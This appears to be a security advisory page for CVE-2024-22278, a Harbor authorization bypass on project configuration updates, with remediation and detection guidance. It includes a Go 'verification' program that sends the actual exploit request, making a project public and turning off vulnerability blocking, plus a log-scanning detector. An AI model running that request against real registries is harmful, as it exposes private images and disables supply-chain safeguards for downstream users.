Platform: go
Component: github.com/goharbor/harbor
Affected: <2.9.5; 2.10.0 to <2.10.3
Fixed in: 2.9.5, 2.10.3 (the Go module version string for 2.9.5 is v2.9.5+incompatible; the +incompatible suffix only means the repository's module path carries no /v2 element, it says nothing about the fix)
CVE-2024-22278 describes an authorization bypass in Harbor, a widely used open-source container registry. Harbor fails to validate the caller's permissions when a project's configuration is updated, so an authenticated user who lacks the required permission on a project can still change that project's settings. Harbor versions before 2.9.5, and 2.10.0 through 2.10.2, are affected; the fix ships in 2.9.5 and 2.10.3 (the 2.9.5 release appears as v2.9.5+incompatible when referenced as a Go module).
The root cause is an incomplete permission check on the project update API (PUT /api/v2.0/projects/{name_or_id}), the call that carries a project's metadata. Project configuration in Harbor controls whether the project is public (pullable anonymously), whether pushed artifacts are scanned automatically, whether artifacts with vulnerabilities at or above a chosen severity are blocked from being pulled, whether content trust (signed images only) is enforced on pull, and whether the system CVE allowlist is reused. An attacker who can rewrite these settings can expose a private project's images to anonymous pulls and switch off the scanning, vulnerability-blocking and signature checks that consumers rely on, so that an unscanned or vulnerable image is served as if it had passed policy. The blast radius is every workload that pulls from the affected project and trusts those controls to have been applied. The flaw does not by itself grant push or delete rights; those remain governed by project membership roles, but weakening a project's guardrails is the natural first step before abusing any other foothold in the environment, and a registry that is wired into CI/CD and deployment pipelines propagates that weakening downstream.
CVE-2024-22278 was publicly disclosed on August 6, 2024. There is no indication of exploitation in the wild, and it is not listed in the CISA KEV catalog. No public proof-of-concept is known, but because the defect is a missing server-side check on an ordinary authenticated API call, writing one needs little more than an HTTP client and a valid low-privileged account; the absence of a PoC should not be read as an absence of risk.
Exploit Status
EPSS: 0.18% (39th percentile)
The fix is to upgrade Harbor to 2.9.5 or later on the 2.9 line, or 2.10.3 or later on the 2.10 line. If you cannot upgrade immediately, reduce the pool of accounts that can reach the project API: the bypass still needs an authenticated Harbor account, so prune project membership and tighten role-based access control (RBAC) so that only accounts with a current need hold project roles. Then audit each project's effective configuration (public flag, automatic scanning, vulnerability blocking and its severity threshold, content trust, CVE allowlist reuse) against your intended baseline; a private project that is suddenly public, or a project whose scanning or vulnerability blocking has been switched off, is the signature of this flaw being abused. A WAF rule is of little use, because a legitimate project admin sends exactly the same PUT request; instead, watch the access logs of the proxy in front of Harbor for PUT requests to /api/v2.0/projects/{project} and reconcile the calling account against that project's admins. After upgrading, confirm the fix by attempting the same configuration change with an account that should not be allowed to make it: Harbor must refuse it with HTTP 403, and the project's settings must be unchanged afterwards.
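The verification step just described, as an added example written for this page (it is not Harbor project code): it sends the same project-update request an attacker would, authenticated as an account that is deliberately not allowed to change the project, and interprets Harbor's answer. The base URL, credentials and project name are assumptions read from environment variables; the metadata keys `public` and `prevent_vul` are real Harbor project-configuration keys. Run it only against a throwaway project, because on an unpatched instance the request succeeds and really changes the project.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"os"
	"time"
)

// Probe describes the request: a Harbor base URL, an account that must NOT
// hold the permission to change project configuration, and a target project.
// All four values are supplied by the operator; none are taken from the advisory.
type Probe struct {
	BaseURL  string // assumed, e.g. https://harbor.example.internal
	Username string // low-privileged account used for the check
	Password string
	Project  string // project name or numeric id, ideally a scratch project
}

// ProbeProjectConfig issues PUT /api/v2.0/projects/{project} with a metadata
// change and returns the HTTP status Harbor answered with.
func ProbeProjectConfig(p Probe) (int, error) {
	// Try to make the project public and to switch off vulnerability blocking:
	// two of the settings an attacker abusing CVE-2024-22278 would want to flip.
	body, err := json.Marshal(map[string]any{
		"metadata": map[string]string{
			"public":      "true",
			"prevent_vul": "false",
		},
	})
	if err != nil {
		return 0, err
	}
	req, err := http.NewRequest(http.MethodPut,
		p.BaseURL+"/api/v2.0/projects/"+p.Project, bytes.NewReader(body))
	if err != nil {
		return 0, err
	}
	req.SetBasicAuth(p.Username, p.Password)
	req.Header.Set("Content-Type", "application/json")

	resp, err := (&http.Client{Timeout: 15 * time.Second}).Do(req)
	if err != nil {
		return 0, err
	}
	defer resp.Body.Close()
	return resp.StatusCode, nil
}

// Verdict maps the status code to what it means for the fix. Only 403 is a
// pass; a 2xx means the low-privileged account changed the project.
func Verdict(status int) string {
	switch {
	case status == http.StatusForbidden:
		return "fixed: configuration change denied"
	case status >= 200 && status < 300:
		return "VULNERABLE: low-privileged account changed project configuration"
	case status == http.StatusUnauthorized:
		return "inconclusive: credentials rejected, check the probe account"
	case status == http.StatusNotFound:
		return "inconclusive: project not found (or not visible to this account)"
	default:
		return fmt.Sprintf("inconclusive: unexpected HTTP %d", status)
	}
}

func main() {
	p := Probe{
		BaseURL:  os.Getenv("HARBOR_URL"),
		Username: os.Getenv("HARBOR_PROBE_USER"),
		Password: os.Getenv("HARBOR_PROBE_PASS"),
		Project:  os.Getenv("HARBOR_PROBE_PROJECT"),
	}
	status, err := ProbeProjectConfig(p)
	if err != nil {
		fmt.Fprintln(os.Stderr, "probe failed:", err)
		os.Exit(2)
	}
	fmt.Println(Verdict(status))
}
```

A 401 or 404 is not a pass: it means the probe account or project is wrong, not that the permission check works. Re-read the project's configuration afterwards as well, since a 403 on the write is the expected result but an unchanged project is the real evidence.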
Upgrade Harbor to version 2.9.5 or later, or to version 2.10.3 or later. This corrects the permission validation performed when project configurations are updated. Harbor is not upgraded from its own user interface; follow the upgrade procedure for your deployment method, that is, the Harbor installer for a docker-compose installation or the Helm chart for Kubernetes.
CVE-2024-22278 is a medium-severity authorization bypass in Harbor that lets an authenticated user without the required permission modify a project's configuration. It affects releases before 2.9.5 and 2.10.0 through 2.10.2.
You are affected if you run Harbor 2.9.4 or earlier, or 2.10.0 through 2.10.2. Check the version shown in the Harbor UI (or the harbor_version field returned by GET /api/v2.0/systeminfo) and upgrade.
Upgrade Harbor to 2.9.5 or 2.10.3, or later. As an interim measure, tighten project membership and RBAC; this limits who can attempt the bypass but does not remove it.
There is currently no evidence of active exploitation in the wild, but the vulnerability's nature makes it a potential target.
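Because nothing confirms exploitation, the practical move is to look for it yourself. The following log check is an added example written for this page, not Harbor project code: it scans access-log lines from the proxy in front of Harbor (assumed to be in nginx's default "combined" format; the five lines embedded below are constructed, not captured from a real instance) for writes to the project update endpoint and reports which client and account made them and whether Harbor accepted the change. Cookie-authenticated UI sessions show "-" as the user in this format, so those findings still need the account resolved from Harbor's core logs or audit log.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
)

// Finding is one request that tried to change a project's configuration.
type Finding struct {
	LineNo    int
	Client    string // remote address
	User      string // $remote_user: basic-auth user, or "-" for cookie (UI) sessions
	Project   string // project name or id taken from the request path
	Status    int
	Succeeded bool // Harbor answered 2xx, i.e. the change was applied
}

var (
	// nginx "combined" format: client - user [time] "METHOD PATH PROTO" status bytes "referer" "agent"
	combinedRe = regexp.MustCompile(`^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})`)
	// Only the project resource itself; sub-resources such as /members or /robots
	// are different operations with their own permission checks.
	projectPathRe = regexp.MustCompile(`^/api/v2\.0/projects/([^/?]+)/?(?:\?.*)?$`)
)

// FindProjectConfigWrites returns every PUT to the project update endpoint whose
// caller is not in allowedUsers. Denied attempts (403) are reported as well: on
// a patched Harbor they are the signal that an account is probing for the bug.
func FindProjectConfigWrites(lines []string, allowedUsers map[string]bool) []Finding {
	var out []Finding
	for i, ln := range lines {
		m := combinedRe.FindStringSubmatch(ln)
		if m == nil || m[4] != "PUT" {
			continue
		}
		pm := projectPathRe.FindStringSubmatch(m[5])
		if pm == nil || allowedUsers[m[2]] {
			continue
		}
		status, err := strconv.Atoi(m[6])
		if err != nil {
			continue
		}
		out = append(out, Finding{
			LineNo:    i + 1,
			Client:    m[1],
			User:      m[2],
			Project:   pm[1],
			Status:    status,
			Succeeded: status >= 200 && status < 300,
		})
	}
	return out
}

// sampleLog is constructed for this example; it is not a captured Harbor log.
var sampleLog = []string{
	`10.0.0.5 - - [06/Aug/2024:10:15:32 +0000] "PUT /api/v2.0/projects/12 HTTP/1.1" 200 0 "-" "curl/8.6.0"`,
	`10.0.0.7 - - [06/Aug/2024:10:16:01 +0000] "GET /api/v2.0/projects/12 HTTP/1.1" 200 812 "-" "Mozilla/5.0"`,
	`10.0.0.9 - admin [06/Aug/2024:10:16:40 +0000] "PUT /api/v2.0/projects/12 HTTP/1.1" 200 0 "-" "curl/8.6.0"`,
	`10.0.0.5 - dev01 [06/Aug/2024:10:17:45 +0000] "PUT /api/v2.0/projects/library HTTP/1.1" 403 0 "-" "curl/8.6.0"`,
	`10.0.0.5 - dev01 [06/Aug/2024:10:18:02 +0000] "PUT /api/v2.0/projects/12/members/3 HTTP/1.1" 200 0 "-" "curl/8.6.0"`,
}

func main() {
	// "admin" stands in for the accounts known to hold the project-admin role.
	for _, f := range FindProjectConfigWrites(sampleLog, map[string]bool{"admin": true}) {
		state := "DENIED"
		if f.Succeeded {
			state = "APPLIED"
		}
		fmt.Printf("line %d: client=%s user=%s project=%s HTTP %d %s\n",
			f.LineNo, f.Client, f.User, f.Project, f.Status, state)
	}
}
```

On the constructed input this reports two lines: the anonymous-looking cookie session that changed project 12 (a hit to investigate against the audit log) and the denied attempt by dev01 against library (a probe). The member change on the last line is deliberately not matched, since it is a different operation.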
Refer to the official Harbor security advisory in the project's GitHub repository: https://github.com/goharbor/harbor/security/advisories